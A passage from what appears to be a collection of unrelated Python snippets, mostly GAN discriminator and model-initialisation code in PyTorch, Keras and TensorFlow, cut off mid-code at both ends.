nn.LeakyReLU(0.2, True)]))\n # if self.decomposed_input:\n # projected_component_sequences.append(\n # nn.Conv2d(input_nc,input_nc, kernel_size=kw, stride=1,\n # padding=padw, bias=use_bias))\n sequences.append(nn.Sequential(*[\n nn.Conv2d(min(max_out_channels, ndf * nf_mult)+in_ch_addition, 1, kernel_size=kw, stride=1,\n padding=padw)])) # output 1 channel prediction map\n self.num_modules = len(sequences)\n if self.decomposed_input:\n for seq in sequences:\n conv_stride = [child.stride[0] for child in seq.children() if 'Conv2d' in str(child.__class__)]\n assert len(conv_stride)<=1,'More than one conv layer in seq?'\n if len(conv_stride)>0:\n projected_component_sequences.append(nn.Conv2d(input_nc,input_nc, kernel_size=kw, stride=conv_stride[0],\n padding=padw, bias=use_bias))\n self.model = nn.ModuleList(sequences+projected_component_sequences)", "def __init__(self, generator:Model,\n discriminator:Model,\n latent_dim:Optional[Union[int, Tuple]]=None,\n n_disc:int=3,\n epochs:int=100, \n batch_size:int=32,\n optimizer:Optional[Union[str, Dict]]=None,\n optimizer_kwargs:Optional[Dict]=None,\n name:str='QGAN',\n random_state:Optional[int]=None,\n checkpoint_dir:Optional[str]=None,\n checkpoint_interval:int=10,\n checkpoint_max_to_keep:Optional[int]=None):\n super().__init__(generator=generator,\n discriminator=discriminator,\n latent_dim=latent_dim,\n n_disc=n_disc,\n epochs=epochs,\n batch_size=batch_size,\n optimizer=optimizer,\n optimizer_kwargs=optimizer_kwargs,\n name=name,\n random_state=random_state,\n checkpoint_dir=checkpoint_dir,\n checkpoint_interval=checkpoint_interval,\n checkpoint_max_to_keep=checkpoint_max_to_keep)", "def build_discriminator():\n\n #Slope and weight initializer are chosen to match parmeters in the paper\n weight_initializer = tf.keras.initializers.RandomNormal(stddev=0.02)\n slope = 0.2\n inputs = keras.Input(shape=(64,64,3))\n x = preprocessing.Rescaling(scale=1./127.5, offset=-1.)(inputs)\n\n # First conv layer\n x = Conv2D(\n 64,\n 4,\n 2,\n padding='same',\n use_bias=False,\n kernel_initializer=weight_initializer\n )(x)\n x = LeakyReLU(alpha=slope)(x)\n\n # Second conv layer\n x = Conv2D(\n 128,\n 4,\n 2,\n padding='same',\n use_bias=False,\n kernel_initializer=weight_initializer\n )(x)\n x = BatchNormalization()(x)\n x = LeakyReLU(alpha=slope)(x)\n \n # Third conv layer\n x = Conv2D(\n 256,\n 4,\n 2,\n padding='same',\n use_bias=False,\n kernel_initializer=weight_initializer\n )(x)\n x = BatchNormalization()(x)\n x = LeakyReLU(alpha=slope)(x)\n\n # Fourth conv layer\n x = Conv2D(\n 512,\n 4,\n 2,\n padding='same',\n use_bias=False,\n kernel_initializer=weight_initializer\n )(x)\n x = BatchNormalization()(x)\n x = LeakyReLU(alpha=slope)(x)\n\n # Predictions. Note that we use logits so thhere is no activation at the end. \n x = layers.Flatten()(x)\n x = layers.Dense(1,kernel_initializer=weight_initializer)(x)\n \n model = keras.Model(inputs=inputs, outputs=x)\n return model", "def build_gan(self):\n # make weights in the discriminator not trainable\n self.d_model.trainable = False\n # get noise and label inputs from generator model\n gen_noise, gen_label = self.g_model.input\n # get image output from the generator model\n gen_output = self.g_model.output\n # connect image output and label input from generator as inputs to discriminator\n gan_output = self.d_model([gen_output, gen_label])\n # define gan model as taking noise and label and outputting a classification\n self.gan_model = Model([gen_noise, gen_label], gan_output)\n # compile model\n opt = Adam(lr=0.0002, beta_1=0.5)\n self.gan_model.compile(loss='binary_crossentropy', optimizer=opt)", "def __init__(self, sigma=0.4, alpha=1.0, reset_always=True):\n super().__init__()\n self.sigma = sigma\n self.alpha = alpha\n self.reset_always = reset_always\n self.guided_attn_masks = None\n self.masks = None", "def __init__(self, img_size=helpers.IMG_SIZE, channels=helpers.CHANNELS):\n super(Discriminator, self).__init__()\n self.model = nn.Sequential(\n nn.Linear(channels*img_size*img_size, 512),\n nn.LeakyReLU(0.2, inplace=True),\n nn.Linear(512, 256),\n nn.LeakyReLU(0.2, inplace=True),\n nn.Linear(256, 1),\n nn.Sigmoid(),\n )", "def define_discriminator(image_shape=(256, 256, 1)):\n\n # weight initialization\n init = RandomNormal(stddev=0.02)\n # source image input\n in_src_image = Input(shape=image_shape)\n # target image input\n in_target_image = Input(shape=image_shape)\n # concatenate images channel-wise\n merged = Concatenate()([in_src_image, in_target_image])\n # C64\n d = Conv2D(64, (4, 4), strides=(2, 2), padding='same',\n kernel_initializer=init)(merged)\n d = LeakyReLU(alpha=0.2)(d)\n # C128\n d = Conv2D(128, (4, 4), strides=(2, 2), padding='same',\n kernel_initializer=init)(d)\n d = BatchNormalization()(d)\n d = LeakyReLU(alpha=0.2)(d)\n # C256\n d = Conv2D(256, (4, 4), strides=(2, 2), padding='same',\n kernel_initializer=init)(d)\n d = BatchNormalization()(d)\n d = LeakyReLU(alpha=0.2)(d)\n # C512\n d = Conv2D(512, (4, 4), strides=(2, 2), padding='same',\n kernel_initializer=init)(d)\n d = BatchNormalization()(d)\n d = LeakyReLU(alpha=0.2)(d)\n # second last output layer\n d = Conv2D(512, (4, 4), padding='same', kernel_initializer=init)(d)\n d = BatchNormalization()(d)\n d = LeakyReLU(alpha=0.2)(d)\n # patch output\n d = Conv2D(1, (4, 4), padding='same', kernel_initializer=init)(d)\n patch_out = Activation('sigmoid')(d)\n # define model\n model = Model([in_src_image, in_target_image], patch_out)\n # compile model\n opt = Adam(lr=0.0002, beta_1=0.5)\n model.compile(loss='binary_crossentropy', optimizer=opt,\n loss_weights=[0.5])\n\n return model", "def build_discriminator(self):\n img_shape = (self.img_size[0], self.img_size[1], self.channels)\n\n model = Sequential()\n ###############\n # Conv Stack 1:\n ###############\n model.add(\n Conv2D(128, kernel_size=5, strides=2, input_shape=img_shape, padding=\"same\")\n ) # 128x128 -> 64x64\n\n model.add(LeakyReLU(alpha=0.2))\n model.add(BatchNormalization(momentum=0.8))\n # model.add(Dropout(0.2))\n\n ###############\n # Conv Stack 2:\n ###############\n model.add(\n Conv2D(128, kernel_size=5, strides=2, padding=\"same\")\n ) # 64x64 -> 32x32\n # model.add(ZeroPadding2D(padding=((0, 1), (0, 1))))\n\n model.add(LeakyReLU(alpha=0.2))\n model.add(BatchNormalization(momentum=0.8))\n # model.add(Dropout(0.25))\n\n ###############\n # Conv Stack 3:\n ###############\n model.add(\n Conv2D(128, kernel_size=4, strides=2, padding=\"same\")\n ) # 32x32 -> 16x16\n\n model.add(LeakyReLU(alpha=0.2))\n model.add(BatchNormalization(momentum=0.8))\n # model.add(Dropout(0.25))\n\n ###############\n # Conv Stack 4:\n ###############\n model.add(Conv2D(128, kernel_size=4, strides=1, padding=\"same\")) # 16x16 -> 8x8\n model.add(LeakyReLU(alpha=0.2))\n model.add(BatchNormalization(momentum=0.8))\n # model.add(Dropout(0.25))\n\n ###############\n # Conv Stack 5:\n ###############\n model.add(Conv2D(128, kernel_size=3, strides=1, padding=\"same\")) # 8x8 -> 4x4\n model.add(LeakyReLU(alpha=0.2))\n model.add(BatchNormalization(momentum=0.8))\n model.add(Dropout(0.4))\n\n model.add(Flatten())\n model.add(Dense(1, activation=\"sigmoid\")) # important binary classification.\n\n model.summary()\n\n # Model require Pair.\n img = Input(shape=img_shape)\n validity = model(img)\n\n return Model(img, validity)", "def __init__(self, config):\n super(NLayerDiscriminator, self).__init__()\n input_nc = config[\"in_channels\"]\n ndf = config[\"ndf\"]\n n_layers = config[\"n_layers\"]\n use_actnorm = config[\"use_actnorm\"]\n use_spectral = config[\"spectral_norm\"]\n if not use_actnorm:\n norm_layer = nn.BatchNorm2d\n else:\n norm_layer = ActNorm\n if type(norm_layer) == functools.partial: # no need to use bias as BatchNorm2d has affine parameters\n use_bias = norm_layer.func != nn.BatchNorm2d\n else:\n use_bias = norm_layer != nn.BatchNorm2d\n\n kw = 4\n padw = 1\n sequence = [nn.Conv2d(input_nc, ndf, kernel_size=kw, stride=2, padding=padw), nn.LeakyReLU(0.2, True)]\n nf_mult = 1\n nf_mult_prev = 1\n for n in range(1, n_layers): # gradually increase the number of filters\n nf_mult_prev = nf_mult\n nf_mult = min(2 ** n, 8)\n sequence += [\n nn.Conv2d(ndf * nf_mult_prev, ndf * nf_mult, kernel_size=kw, stride=2, padding=padw, bias=use_bias),\n norm_layer(ndf * nf_mult),\n nn.LeakyReLU(0.2, True)\n ]\n\n nf_mult_prev = nf_mult\n nf_mult = min(2 ** n_layers, 8)\n sequence += [\n nn.Conv2d(ndf * nf_mult_prev, ndf * nf_mult, kernel_size=kw, stride=1, padding=padw, bias=use_bias),\n norm_layer(ndf * nf_mult),\n nn.LeakyReLU(0.2, True)\n ]\n\n sequence += [\n nn.Conv2d(ndf * nf_mult, 1, kernel_size=kw, stride=1, padding=padw)] # output 1 channel prediction map\n\n if use_spectral:\n for i, lay in enumerate(sequence):\n if isinstance(lay, nn.Conv2d):\n sequence[i] = spectral_norm(lay)\n\n self.main = nn.Sequential(*sequence)\n\n weights_init(self.main)", "def discriminator_model_lungs():\n # Initialize the weights\n init = tf.random_normal_initializer(0.0, 0.02)\n\n img_shape = (400, 400, 1)\n\n # Source and target image input\n source_img = tf.keras.Input(shape=img_shape)\n target_img = tf.keras.Input(shape=img_shape)\n\n # Concatenate images channel-wise\n src_tgt_img = Concatenate()([source_img, target_img]) # L : 400 x 400 x 1 # G: 200 x 200 x 1\n\n # C128\n d1 = Conv2D(filters=128, kernel_size=(4, 4), strides=(2, 2), padding='same', kernel_initializer=init)(\n src_tgt_img) # L: 200 x 200 x 128 # G: 100 x 100 x 128 # RF: 4\n d1 = LeakyReLU(alpha=0.2)(d1)\n\n # C256\n d2 = Conv2D(filters=256, kernel_size=(4, 4), strides=(2, 2), padding='same', kernel_initializer=init)(\n d1) # G: 100 x 100 x 256 # L: 50 x 50 x 256 # RF: 10\n d2 = BatchNormalization()(d2)\n d2 = LeakyReLU(alpha=0.2)(d2)\n\n # C512\n d3 = Conv2D(filters=512, kernel_size=(4, 4), strides=(2, 2), padding='same', kernel_initializer=init)(\n d2) # G: 50 x 50 x 512 # L: 25 x 25 x 512 # RF: 22\n d3 = BatchNormalization()(d3)\n d3 = LeakyReLU(alpha=0.2)(d3)\n d3 = ZeroPadding2D()(d3) # G: 52 x 52 x 512 # L: 27 x 27 x 512\n\n # Patch output\n d4 = Conv2D(filters=1, kernel_size=(3, 3), strides=(1, 1), padding='valid', kernel_initializer=init)(\n d3) # G: 50 x 50 x 1 # L: 25 x 25 x 1 # RF: 38\n output_patch = Activation('sigmoid')(d4)\n\n # Define model\n discriminator_model = tf.keras.Model([source_img, target_img], output_patch)\n return discriminator_model", "def build_discriminator(shape):\n input_img = Input(shape=(shape)) \n x = Conv2D(64, (3, 3), padding='same')(input_img)\n x = LeakyReLU()(x)\n x = Dropout(0.25)(x)\n x = BatchNormalization(momentum=0.8)(x)\n x = AveragePooling2D((2, 2), padding='same')(x)\n x = Conv2D(8, (3, 3), padding='same')(x)\n x = LeakyReLU()(x)\n x = Dropout(0.25)(x)\n x = BatchNormalization(momentum=0.8)(x)\n x = AveragePooling2D((2, 2), padding='same')(x)\n x = Conv2D(8, (3, 3), padding='same')(x)\n x = LeakyReLU()(x)\n x = Dropout(0.25)(x)\n x = BatchNormalization(momentum=0.8)(x)\n x = AveragePooling2D((2, 2), padding='same')(x)\n x = Conv2D(1, (3, 3), padding='same')(x)\n x = LeakyReLU()(x)\n x = Flatten()(x)\n o = Dense(1,activation='sigmoid')(x)\n Discriminator=Model(input_img,o,name='discriminator')\n return input_img,o,Discriminator", "def load_discriminator(dcgan_net):\n netD_trained = dcgan_net.myTrainOneStepCellForD.network.netD\n for m in netD_trained.discriminator.cells_and_names():\n if m[0] == '0':\n print(m[0], m[1])\n conv_1 = m[1]\n elif m[0] == '1':\n print(m[0], m[1])\n leakyReLU_1 = m[1]\n elif m[0] == '2':\n print(m[0], m[1])\n conv_2 = m[1]\n elif m[0] == '3':\n print(m[0], m[1])\n bm_1 = m[1]\n elif m[0] == '4':\n print(m[0], m[1])\n leakyReLU_2 = m[1]\n elif m[0] == '5':\n print(m[0], m[1])\n conv_3 = m[1]\n return conv_1, leakyReLU_1, conv_2, bm_1, leakyReLU_2, conv_3", "def build_gan(self):\n\n # Specify te generators used to build various components.\n optimizer_generator = Adam(0.0002, 0.5)\n optimizer_discriminator = Adam(0.0002, 0.5)\n optimizer_GAN = Adam(0.0002, 0.5)\n\n loss_measure_generator = \"binary_crossentropy\"\n loss_measure_discriminator = \"binary_crossentropy\"\n loss_measure_GAN = \"binary_crossentropy\"\n\n metrics = [\"accuracy\", \"mae\", \"mse\", \"mape\", \"cosine\"]\n\n # See if the specified model paths exist, if they don't then we start training new models\n if (\n hasattr(self, \"discriminator_path\")\n and hasattr(self, \"generator_path\")\n and self.discriminator_path.is_file()\n and self.generator_path.is_file()\n ):\n self.discriminator = load_model(self.discriminator_path)\n self.generator = load_model(self.generator_path)\n print(\"Loaded models...\")\n else: # training new model.\n print(\"Training models...\")\n\n # Generate the tensorboard and its call back\n callback_tensorboard = TensorBoard(\n log_dir=path_log_run, histogram_freq=0, write_images=True\n )\n\n # self.callbacks_list = [callback_tensorboard]\n\n # Build discriminator and compile it.\n self.discriminator = self.build_discriminator()\n\n # Training discriminator!\n self.discriminator.compile(\n loss=loss_measure_discriminator,\n optimizer=optimizer_discriminator,\n # metrics=metrics,\n # callbacks=self.callbacks_list,\n )\n\n # Build generator and compile it.\n self.generator = self.build_generator()\n\n # Training generator!\n self.generator.compile(\n loss=loss_measure_generator,\n optimizer=optimizer_generator,\n # callbacks=self.callbacks_list,\n )\n\n # These next few lines setup the training for the GAN, which the input Vector has a shape of noise_parameters\n z = Input(shape=(self.dimensions_noise,))\n img = self.generator(z)\n\n self.discriminator.trainable = False\n\n # Call the discriminator on the image generated by the generator.\n # Store the output\n valid = self.discriminator(img)\n\n # Form a model that combine both the input and the output pair.\n self.combined = Model(z, valid)\n\n # Compile the model using binary_crossentropy with the\n self.combined.compile(loss=loss_measure_GAN, optimizer=optimizer_GAN)", "def __init__(self, input_nc, ndf=64, n_layers=6, norm_layer=nn.BatchNorm2d):\n super(DovenetNLayerDiscriminator, self).__init__()\n num_outputs = ndf * min(2 ** n_layers, 8)\n self.D = OrgDiscriminator(input_nc, ndf, n_layers, norm_layer)\n self.convl1 = spectral_norm(nn.Conv2d(num_outputs, num_outputs, kernel_size=1, stride=1))\n self.relul1 = nn.LeakyReLU(0.2)\n self.convl2 = spectral_norm(nn.Conv2d(num_outputs, num_outputs, kernel_size=1, stride=1))\n self.relul2 = nn.LeakyReLU(0.2)\n self.convl3 = nn.Conv2d(num_outputs, 1, kernel_size=1, stride=1)\n self.convg3 = nn.Conv2d(num_outputs, 1, kernel_size=1, stride=1)", "def init_weights(self, pretrained=None):\n\n super(EncoderDecoder_gan, self).init_weights(pretrained)\n self.backbone.init_weights(pretrained=pretrained)\n self.backbone_gan.init_weights(pretrained=pretrained)\n self.decode_head.init_weights()\n # init GAN\n # self.discriminator.init_weight()\n # self.G_head.init_weights()\n if self.with_auxiliary_head:\n if isinstance(self.auxiliary_head, nn.ModuleList):\n for aux_head in self.auxiliary_head:\n aux_head.init_weights()\n else:\n self.auxiliary_head.init_weights()", "def __init__(self, hparams):\n # init superclass\n super(FastNeuralStyleSystem, self).__init__()\n self.hparams = hparams\n torch.manual_seed(hparams.seed)\n np.random.seed(hparams.seed)\n\n self.batch_size = hparams.batch_size\n if hparams.model == \"hrnet\":\n self.style_model = HRNet()\n else:\n self.style_model = TransformerNet()\n self.vgg_extractor = Vgg16(requires_grad=False)\n\n self.transform = transforms.Compose([\n transforms.Resize(hparams.image_size),\n transforms.CenterCrop(hparams.image_size),\n transforms.ToTensor(),\n transforms.Lambda(lambda x: x.mul(255))\n ])\n\n self.style_transform = transforms.Compose([\n transforms.Resize(hparams.image_size),\n transforms.CenterCrop(hparams.image_size),\n transforms.ToTensor(),\n transforms.Lambda(lambda x: x.mul(255))\n ])\n\n content_image = utils.load_image(\n self.hparams.content_image, scale=self.hparams.content_scale)\n self.content_image = self.style_transform(content_image)\n\n style = utils.load_image(os.path.join(\n 'images', 'style-images', f'{hparams.style_image}.jpg'), scale=0.5)\n style = self.style_transform(style).requires_grad_(False)\n self.style_image = style.repeat(hparams.batch_size, 1, 1, 1)\n\n self.features_style = self.vgg_extractor(\n utils.normalize_batch(self.style_image))\n self.gram_style = [utils.gram_matrix(y) for y in self.features_style]\n\n # self.temp_dir = f\"{self.hparams.output_dir}/{self.hparams.style_image}_steps_c_{self.hparams.content_weight}_s_{self.hparams.style_weight}\"\n # os.makedirs(self.temp_dir, exist_ok=True)", "def init():\n ########################\n # OPTIONS\n ########################\n # Debugging tools\n global TIMER # displays time of every major step\n TIMER = True\n global MONITOR # displays monitoring infos\n MONITOR = False\n \n global directories\n directories = {'1Face': 'data/1Face/',\n '2Faces': 'data/2Faces/',\n '3Faces': 'data/3Faces/',\n 'test': 'data/test/'}\n \n # Opt. swicthes\n global maxfinder # to find the max dim. amongst the pictures\n maxfinder = False\n global ML_mode\n ML_mode = {'CNN_Train': False,\n 'CNN_Pred' : True,\n 'Sampler': True}\n \n # Global variables\n global num_pics\n num_pics = {'1Face': 0,\n '2Faces': 0,\n '3Faces': 0}\n global labels\n labels = {'1Face': 0,\n '2Faces': 1,\n '3Faces': 2}\n global num_data\n num_data = 0\n global splitsize # Fraction of data to build the training set\n splitsize = 0.7 \n global maxheight # Resize the pictures to a power of 2 for CNN (2^8 here)\n maxheight = 128\n global maxwidth\n maxwidth = 128\n global TreshEdge # Number of consecutive black pixels to define an edge\n TreshEdge = 2\n global TreshFace # Number of white pixels to define a face (or large edge)\n TreshFace = maxheight/16", "def __init__(self, opt):\n BaseModel.__init__(self, opt) # call the initialization method of BaseModel\n\n self.opt = opt\n if opt.d_loss_mode == 'wgan' and not opt.use_gp:\n raise NotImplementedError('using wgan on D must be with use_gp = True.')\n\n self.loss_names = ['G_real', 'G_fake', 'D_real', 'D_fake', 'D_gp', 'G', 'D']\n self.visual_names = ['real_visual', 'gen_visual']\n\n if self.isTrain: # only defined during training time\n self.model_names = ['G', 'D']\n else:\n self.model_names = ['G']\n\n if self.opt.cgan:\n probs = np.ones(self.opt.cat_num)/self.opt.cat_num \n self.CatDis = Categorical(torch.tensor(probs))\n\n # define networks \n self.netG = networks.define_G(opt.z_dim, opt.output_nc, opt.ngf, opt.netG,\n opt.g_norm, opt.cgan, opt.cat_num, not opt.no_dropout, opt.init_type, opt.init_gain, self.gpu_ids)\n\n if self.isTrain: # define a discriminator; conditional GANs need to take both input and output images; Therefore, #channels for D is input_nc + output_nc\n self.netD = networks.define_D(opt.input_nc, opt.ndf, opt.netD,\n opt.d_norm, opt.cgan, opt.cat_num, opt.init_type, opt.init_gain, self.gpu_ids)\n\n if self.isTrain: # only defined during training time\n # define G mutations \n self.G_mutations = []\n for g_loss in opt.g_loss_mode: \n self.G_mutations.append(networks.GANLoss(g_loss, 'G', opt.which_D).to(self.device))\n # define loss functions\n self.criterionD = networks.GANLoss(opt.d_loss_mode, 'D', opt.which_D).to(self.device)\n # initialize optimizers\n self.optimizer_G = torch.optim.Adam(self.netG.parameters(), lr=opt.lr_g, betas=(opt.beta1, opt.beta2))\n self.optimizer_D = torch.optim.Adam(self.netD.parameters(), lr=opt.lr_d, betas=(opt.beta1, opt.beta2))\n self.optimizers.append(self.optimizer_G)\n self.optimizers.append(self.optimizer_D)\n \n # Evolutinoary candidatures setting (init) \n\n self.G_candis = [] \n self.optG_candis = [] \n self.last_evaly = []\n self.last_evalimgs = []\n self.min_Fq = 100.0\n self.max_Fq = -100.0\n self.min_Fd = 100.0\n self.max_Fd = -100.0\n self.normFq = lambda f : (f-self.min_Fq) / (self.max_Fq-self.min_Fq)\n self.normFd = lambda f : (f-self.min_Fd) / (self.max_Fd-self.min_Fd)\n for i in range(opt.candi_num): \n self.G_candis.append(copy.deepcopy(self.netG.state_dict()))\n self.optG_candis.append(copy.deepcopy(self.optimizer_G.state_dict()))\n \n # visulize settings \n self.N =int(np.trunc(np.sqrt(min(opt.batch_size, 64))))\n if self.opt.z_type == 'Gaussian': \n self.z_fixed = torch.randn(self.N*self.N, opt.z_dim, 1, 1, device=self.device) \n elif self.opt.z_type == 'Uniform': \n self.z_fixed = torch.rand(self.N*self.N, opt.z_dim, 1, 1, device=self.device)*2. - 1. \n if self.opt.cgan:\n yf = self.CatDis.sample([self.N*self.N])\n self.y_fixed = one_hot(yf, [self.N*self.N, self.opt.cat_num])\n\n # the # of image for each evluation\n self.eval_size = max(math.ceil((opt.batch_size * opt.D_iters) / opt.candi_num), opt.eval_size)", "def __init__(self, mode, cfg):\n super(DMCM, self).__init__()\n\n self.conv_net = cfg.get_image_net(mode)\n self.sparse_net = cfg.get_genes_net(mode)\n\n # Matrix network does not need weight initialization because there can\n # be no vanishing gradients.\n self.conv_net.apply(_init_weights_xavier)", "def build_discriminator(self):\n\n def d_block(layer_input, filters, strides=1, bn=True):\n\n d = tf.keras.layers.Conv2D(filters, kernel_size=3, strides=strides, padding='same')(layer_input)\n if bn:\n d = tf.keras.layers.BatchNormalization(momentum=0.8)(d)\n d = tf.keras.layers.LeakyReLU(alpha=0.2)(d)\n \n return d\n\n # Input img\n d0 = tf.keras.layers.Input(shape=self.hr_shape)\n\n d1 = d_block(d0, self.df, bn=False)\n d2 = d_block(d1, self.df, strides=2)\n d3 = d_block(d2, self.df)\n d4 = d_block(d3, self.df, strides=2)\n d5 = d_block(d4, self.df * 2)\n d6 = d_block(d5, self.df * 2, strides=2)\n d7 = d_block(d6, self.df * 2)\n d8 = d_block(d7, self.df * 2, strides=2)\n\n validity = tf.keras.layers.Conv2D(1, kernel_size=1, strides=1, activation='sigmoid', padding='same')(d8)\n\n return tf.keras.models.Model(d0, validity)", "def build_model(cls, args):\n base_architecture(args) \n return StyleGANGeneratorPretrain(args)", "def __init__(self, machine):\n super().__init__(machine)\n self.features['has_rgb_dmds'] = True", "def __init__(self):\n torch.nn.Module.__init__(self)\n # Convolution and pooling layers of VGG-16.\n self.features = torchvision.models.vgg16(pretrained=True).features\n self.features = torch.nn.Sequential(*list(self.features.children())\n [:-1]) # Remove pool5.\n # Linear classifier.\n self.fc = torch.nn.Linear(512**2, 36)", "def train_discriminator(gan, generator, discriminator, x_train, batch_size):\n # Get a random set of input noise.\n noise = get_noise(batch_size)\n\n # Generate fake MNIST images.\n generated_images = generator.predict(noise)\n # Get a random set of images from the actual MNIST dataset.\n image_batch = x_train[np.random.randint(0, x_train.shape[0], size=batch_size)]\n # Put them together in a single vector(list).\n X = np.concatenate([image_batch, generated_images])\n\n # Generate 0.0 (fake) for the whole vector.\n Y = np.zeros(2*batch_size)\n # Label real images correctly as 1.0.\n Y[:batch_size] = 1.0\n\n discriminator.trainable = True\n discriminator.train_on_batch(X, Y)", "def build_discriminator(self):\n # label input\n in_label = Input(shape=(1,))\n # embedding for categorical input\n li = Embedding(self.n_classes, 50)(in_label)\n # scale up to image dimensions with linear activation\n n_nodes = self.in_shape[0] * self.in_shape[1]\n li = Dense(n_nodes)(li)\n # reshape to additional channel\n li = Reshape((self.in_shape[0], self.in_shape[1], 1))(li)\n # image input\n in_image = Input(shape=self.in_shape)\n # concat label as a channel\n merge = Concatenate()([in_image, li])\n # downsample\n fe = Conv2D(128, (3,3), strides=(2,2), padding='same')(merge)\n fe = LeakyReLU(alpha=0.2)(fe)\n # downsample\n fe = Conv2D(128, (3,3), strides=(2,2), padding='same')(fe)\n fe = LeakyReLU(alpha=0.2)(fe)\n # flatten feature maps\n fe = Flatten()(fe)\n # dropout\n fe = Dropout(0.4)(fe)\n # output\n out_layer = Dense(1, activation='sigmoid')(fe)\n # define model\n self.d_model = Model([in_image, in_label], out_layer)\n # compile model\n opt = Adam(lr=0.0002, beta_1=0.5)\n self.d_model.compile(loss='binary_crossentropy', optimizer=opt, metrics=['accuracy'])", "def discriminator_block(self, name):\n\n if self.fit_mask : \n \n inputs = Input(shape=(2+self.nb_classe_mask, self.image_row, self.image_column, self.image_depth), name='dis_input')\n else :\n # In:\n inputs = Input(shape=(2, self.image_row, self.image_column, self.image_depth), name='dis_input')\n\n # Input 64\n disnet = Conv3D(self.discriminator_kernel * 1, 4, strides=2,\n padding='same',\n kernel_initializer='he_normal',\n data_format='channels_first',\n name=name + '_conv_dis_1')(inputs)\n disnet = LeakyReLU(0.01)(disnet)\n\n # Hidden 1 : 32\n disnet = Conv3D(self.discriminator_kernel * 2, 4, strides=2,\n padding='same',\n kernel_initializer='he_normal',\n data_format='channels_first',\n name=name + '_conv_dis_2')(disnet)\n disnet = LeakyReLU(0.01)(disnet)\n\n # Hidden 2 : 16\n disnet = Conv3D(self.discriminator_kernel * 4, 4, strides=2,\n padding='same',\n kernel_initializer='he_normal',\n data_format='channels_first',\n name=name + '_conv_dis_3')(disnet)\n disnet = LeakyReLU(0.01)(disnet)\n\n # Hidden 3 : 8\n disnet = Conv3D(self.discriminator_kernel * 8, 4, strides=2,\n padding='same',\n kernel_initializer='he_normal',\n data_format='channels_first',\n name=name + '_conv_dis_4')(disnet)\n disnet = LeakyReLU(0.01)(disnet)\n\n # Hidden 4 : 4\n disnet = Conv3D(self.discriminator_kernel * 16, 4, strides=2,\n padding='same',\n kernel_initializer='he_normal',\n data_format='channels_first',\n name=name + '_conv_dis_5')(disnet)\n disnet = LeakyReLU(0.01)(disnet)\n\n # Decision : 2\n decision = Conv3D(1, 2, strides=1,\n use_bias=False,\n kernel_initializer='he_normal',\n data_format='channels_first',\n name='dis_decision')(disnet)\n\n decision = Reshape((1,))(decision)\n\n model = Model(inputs=[inputs], outputs=[decision], name=name)\n return model", "def __init__(self):\r\n torch.nn.Module.__init__(self)\r\n # Convolution and pooling layers of VGG-16.\r\n self.features = torchvision.models.vgg19_bn(pretrained=False).features\r\n self.features = torch.nn.Sequential(*list(self.features.children())\r\n [:-1]) # Remove pool5.\r\n # Linear classifier.\r\n self.fc = torch.nn.Linear(512**2, 11)", "def init_weights(self, pretrained=None):\n if pretrained is not None:\n self.pretrained = pretrained\n self.backbone.init_weights(self.pretrained)\n self.mesh_head.init_weights()\n if self.with_gan:\n self.discriminator.init_weights()", "def __init__(self, random_generator: RandomState):\n super().__init__([MoldelStacker(random_generator), SocialMediaLayer()])", "def __init__(self, generator, discriminator, noise_dim, save_path):\n self.generator = generator\n self.discriminator = discriminator\n self.noise_dim = noise_dim\n self.save_path = save_path\n self.check_points_path = os.path.join(save_path, 'check_points')\n self.output_image_path = os.path.join(save_path, 'images_during_training')\n self.generator.generate()", "def initialisation(self):\n self.create_variables()\n self.create_placeholders()\n self.build_model()\n self.reset_lr(None, True)\n self.build_loss()\n self.initialised = True", "def make_discriminator():\n constraint_shape = Params.environment.constraint_shape()\n solution_shape = Params.environment.solution_shape()\n joint_shape = constraint_shape[:]\n joint_shape[0] += solution_shape[0]\n\n constraint_input = placeholder_node(\"constraint_input\", constraint_shape, 1)\n solution_input = placeholder_node(\"solution_input\", solution_shape, 1)\n joint_input = tf.concat([constraint_input, solution_input], 1)\n return (\n constraint_input,\n solution_input,\n FeedforwardNetwork(\n name=\"artificial_discriminator\",\n session=Params.session,\n input_shape=joint_shape,\n layer_shapes=Params.internal_layer_shapes + [[1]],\n activations=Params.activation,\n input_node=joint_input,\n save_location=Params.save_location,\n ),\n )", "def __init__(self, apply_nonlin=None, batch_dice=False, do_bg=True, smooth=1.,\n square=False, square_volumes=False):\n super(GDL, self).__init__()\n\n self.square_volumes = square_volumes\n self.square = square\n self.do_bg = do_bg\n self.batch_dice = batch_dice\n self.apply_nonlin = apply_nonlin\n self.smooth = smooth", "def setup_training_discriminator(model):\n train_dir = os.path.join(FLAGS.log_root, \"train-discriminator\")\n if not os.path.exists(train_dir): os.makedirs(train_dir)\n\n model.build_graph() # build the graph\n\n saver = tf.train.Saver(max_to_keep=20) # we use this to load checkpoints for decoding\n sess = tf.Session(config=util.get_config())\n #init = tf.global_variables_initializer()\n #sess.run(init)\n util.load_ckpt(saver, sess, ckpt_dir=\"train-discriminator\")\n\n\n\n return sess, saver,train_dir", "def __init__(self, nclasses, device):\n super(HybridNN, self).__init__(nclasses, device)\n self.data_dev = qml.device(device, wires=self.req_qub_out)\n self.device = device\n self.model_dev = None\n self.nn = None\n self.bias = True", "def __init__(self):\n\n super(LocalDiscriminator, self).__init__()\n\n # input image will have the size of 128x128x3\n self.first_conv_layer = TransitionDown(in_channels=3, out_channels=32, kernel_size=5)\n self.second_conv_layer = TransitionDown(in_channels=32, out_channels=64, kernel_size=5)\n self.third_conv_layer = TransitionDown(in_channels=64, out_channels=128, kernel_size=5)\n self.fourth_conv_layer = TransitionDown(in_channels=128, out_channels=32, kernel_size=5)\n self.fifth_conv_layer = TransitionDown(in_channels=32, out_channels=1, kernel_size=5)\n \n '''\n self.fc1 = nn.Linear(4 * 4 * 512, 10)\n self.fc2 = nn.Linear(10, 1)\n\n torch.nn.init.xavier_uniform(self.fc1.weight)\n torch.nn.init.xavier_uniform(self.fc2.weight)\n '''", "def __init__(self, opt):\n BaseModel.__init__(self, opt)\n self.loss_names = ['G_GAN', 'D_real', 'D_fake', 'Feat', 'VGG', 'SSIM', 'PSNR']\n self.visual_names = ['fake_B', 'real_B']\n if self.isTrain:\n self.model_names = ['G', 'D']\n else:\n self.model_names = ['G']\n\n self.netG = generator.define_G(opt.input_nc, opt.output_nc, opt.ngf, opt.netG, opt.norm,\n not opt.no_dropout, opt.init_type, opt.init_gain, self.gpu_ids,\n not opt.no_transp_conv,\n opt.n_downsample_global, opt.n_blocks_global, opt.n_local_enhancers,\n opt.n_blocks_local)\n\n if self.isTrain:\n self.netD = discriminator.define_D(opt.input_nc + opt.output_nc, opt.ndf, 